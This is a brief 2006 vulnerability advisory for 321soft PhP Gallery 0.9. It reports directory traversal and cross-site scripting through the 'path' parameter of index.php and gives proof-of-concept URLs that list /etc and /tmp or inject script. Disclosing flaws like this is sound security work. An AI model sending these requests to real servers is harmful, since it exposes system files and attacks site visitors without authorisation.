321soft PhP Gallery 0.9 - directory travel & XSS -------------------------------------------------------- Software: 321soft PhP Gallery Version: 0.9 Type: directory travel & XSS Date: Mai 3 01:38:04 CEST 2006 Vendor: 321soft.de Page: http://321soft.de/ Risc: Middle credits: ---------------------------- d4igoro - d4igoro[at]gmail[dot]com http://d4igoro.blogspot.com/ vulnerability: ---------------------------- http://[target]/index.php?path=/etc http://[target]/index.php?path=/tmp http://[target]/index.php?path=[XSS] solution: ---------------------------- index.php fix $path notes: ---------------------------- The vendor has been informed. http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html